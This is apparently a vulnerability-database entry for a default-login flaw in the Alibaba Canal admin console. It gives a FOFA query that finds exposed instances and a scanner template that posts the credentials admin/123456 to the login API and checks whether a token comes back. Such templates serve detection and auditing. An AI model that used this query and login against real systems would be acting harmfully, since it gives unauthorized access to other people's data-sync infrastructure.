alibaba-canal-default-password: Alibaba Canal Default Password

日期: 2025-09-01 | 影响软件: Alibaba Canal | POC: 已公开

漏洞描述

An Alibaba Canal default login was discovered. FOFA: title="Canal Admin"

PoC代码[已公开]

id: alibaba-canal-default-password

info:
    name: Alibaba Canal Default Password
    author: jweny
    severity: high
    verified: true
    description: |
        An Alibaba Canal default login was discovered.
        FOFA: title="Canal Admin"
    reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
    tags: alibaba,default-login
    created: 2023/06/24

rules:
    r1:
        request:
            method: POST
            path: /api/v1/user/login
            headers:
                Content-Type: application/json
            body: '{"username":"admin","password":"123456"}'
        expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
expression: r1()

相关漏洞推荐